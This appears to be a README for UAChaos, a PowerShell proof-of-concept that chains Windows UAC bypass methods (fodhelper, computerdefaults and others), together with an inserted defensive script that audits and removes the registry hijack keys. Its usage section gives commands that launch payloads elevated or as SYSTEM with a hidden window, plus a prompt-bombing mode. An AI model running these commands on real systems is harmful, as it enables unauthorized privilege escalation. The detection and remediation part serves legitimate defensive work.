This PowerShell script is a proof-of-concept (PoC) demonstrating various known User Account Control (UAC) bypass methods in Windows. It enables testing of multiple techniques to execute commands with elevated (administrator) privileges without triggering a UAC prompt.
Supports executing individual methods such as `fodhelper`, `eventvwr`, `computerdefaults`, `sdclt`, `wsreset`, `mmc`, `eudcedit`, `netplwiz`, or running all of them sequentially until one succeeds.
- Manipulates registry keys to hijack system processes for privilege elevation.
- Launches the corresponding system executable tied to each bypass method.
- Cleans up registry entries after execution.
- Accepts a custom command to run elevated (default is `cmd.exe`).
- Includes a method to create a SYSTEM process.
- Runs the UAC bypass with the `RUNASINVOKER` variable.
- Uses the UAC prompt-bombing attack described in the article "New Botnet Emerges from the Shadows: NightshadeC2".
| Method | Description | Status (2025) |
|---|---|---|
| fodhelper | Registry-based bypass with fodhelper.exe | Works reliably on current Windows 10 and 11 |
| eventvwr | Event Viewer registry bypass | Works reliably on Windows 7 |
| computerdefaults | Registry-based bypass with computerdefaults.exe | Works reliably on current Windows 10 and 11 |
| sdclt | Registry-based bypass with sdclt.exe | Mostly patched, often non-functional |
| wsreset | Limited functionality with wsreset.exe | Works depending on system configuration |
| mmc | Limited functionality with mmc.exe | Works under specific conditions |
| eudcedit | Limited functionality with eudcedit.exe | Works under specific conditions |
| netplwiz | Limited functionality with netplwiz.exe | Works under specific conditions |
| all | Runs all methods sequentially | Attempts all methods until one succeeds |
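As an added defensive counterpart to the table above (example code, not part of UAChaos): a PowerShell audit that reports the host's UAC policy level and scans `HKCU` for the class-registration keys that the registry-based methods hijack, optionally removing leftovers. The key paths are the publicly documented ones for these techniques (MITRE ATT&CK T1548.002); that UAChaos uses exactly these keys is an assumption, since the README does not list them.

```powershell
<#
  Added defensive example (not part of UAChaos): audit a host for the per-user
  registry hijack keys abused by the registry-based UAC bypass methods, report
  the UAC policy level, and optionally remove leftover hijack entries.
  Assumption: the key paths below are the publicly documented ones for each
  technique; the README does not list the keys the script itself writes.
#>
[CmdletBinding()]
param(
    [switch]$Remediate   # remove hijack keys instead of only reporting them
)

# Method -> HKCU key(s) whose (Default) value / DelegateExecute gets hijacked.
$HijackKeys = @{
    'fodhelper / computerdefaults' = @('HKCU:\Software\Classes\ms-settings\shell\open\command')
    'eventvwr'                     = @('HKCU:\Software\Classes\mscfile\shell\open\command')
    'sdclt'                        = @('HKCU:\Software\Classes\Folder\shell\open\command',
                                       'HKCU:\Software\Classes\exefile\shell\runas\command')
    'wsreset'                      = @('HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command')
}

function Get-UacPosture {
    # EnableLUA=0 disables UAC entirely; ConsentPromptBehaviorAdmin=2 ("Always
    # notify") stops the silent auto-elevation these bypasses depend on.
    $pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    [pscustomobject]@{
        EnableLUA                  = $pol.EnableLUA
        ConsentPromptBehaviorAdmin = $pol.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = $pol.PromptOnSecureDesktop
        AutoElevateBlocked         = ($pol.ConsentPromptBehaviorAdmin -eq 2)
    }
}

function Find-UacHijackKeys {
    # A clean user profile has none of these keys, so presence alone is a finding.
    foreach ($method in $HijackKeys.Keys) {
        foreach ($key in $HijackKeys[$method]) {
            if (-not (Test-Path $key)) { continue }
            $props = Get-ItemProperty -Path $key
            [pscustomobject]@{
                Method          = $method
                Key             = $key
                Command         = $props.'(default)'
                DelegateExecute = if ($props.PSObject.Properties['DelegateExecute']) { '<set>' } else { '<absent>' }
            }
        }
    }
}

function Remove-UacHijackKeys {
    # Remove only the hijacked "command" key, leaving any legitimate parent intact.
    foreach ($hit in Find-UacHijackKeys) {
        Write-Host "Removing $($hit.Key) (method: $($hit.Method))"
        Remove-Item -Path $hit.Key -Recurse -Force
    }
}

Get-UacPosture | Format-List
$hits = @(Find-UacHijackKeys)
if ($hits.Count -eq 0) {
    Write-Host 'No UAC bypass hijack keys found under HKCU.'
} else {
    $hits | Format-Table -AutoSize
    if ($Remediate) { Remove-UacHijackKeys }
}
```

Run it as the user whose profile you want to check (the hijack keys live in that user's `HKCU`); `-Remediate` deletes the `command` keys it finds. `AutoElevateBlocked` being `$false` means the machine is not at the "Always notify" UAC level, which is the configuration the auto-elevate based methods rely on.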
- Windows 7 or later.
- Local group Administrators privileges. Check/add with `net localgroup Administrators user /add`.
- PowerShell with permissions to modify registry keys and execute scripts.
- On most current Windows versions, some bypass methods are patched; `fodhelper` and `eventvwr` are generally still effective.
```powershell
# For hiding the banner and UAChaos output use: -WindowStyle Hidden
powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "& {.\UAChaos.ps1 -Method computerdefaults -Command 'cmd'}"

# Run a single method (computerdefaults) with the default elevated command (cmd.exe)
.\UAChaos.ps1 -Method computerdefaults

# Run a single method (computerdefaults) with the command payload.exe as SYSTEM (hidden)
.\UAChaos.ps1 -Method computerdefaults -Command "C:\Temp\payload.exe" -GetSystem

# Run the UAC prompt-bombing file. No commands yet!
.\UAChaos.ps1 -UACBombing -Command "C:\Temp\payload_cmd.exe"

# Run the RUNASINVOKER UAC bypass with commands
.\UAChaos.ps1 -RunAsInvoker -Command "mmc"

# Run all methods sequentially
.\UAChaos.ps1 -Method all

# Run fodhelper with a custom command (e.g., PowerShell)
.\UAChaos.ps1 -Method fodhelper -Command "powershell.exe -NoProfile"
```

- Needs the MSDT tools signed by Microsoft (ServiceUI.exe).
- Check your session ID first with `query user`.

```powershell
.\UAChaos.ps1 -Method computerdefaults -Command "C:\Temp\ServiceUI.exe -session:2 C:\Windows\System32\cmd.exe" -GetSystem
```

- This script is intended strictly for educational and authorized testing purposes.
- UAC bypass techniques circumvent security controls and must only be used with explicit permission.
- Unauthorized use may violate laws and policies.
- Use responsibly and ethically.
This script is currently alpha and may still have many bugs. If you find some and want to contribute, please open an issue.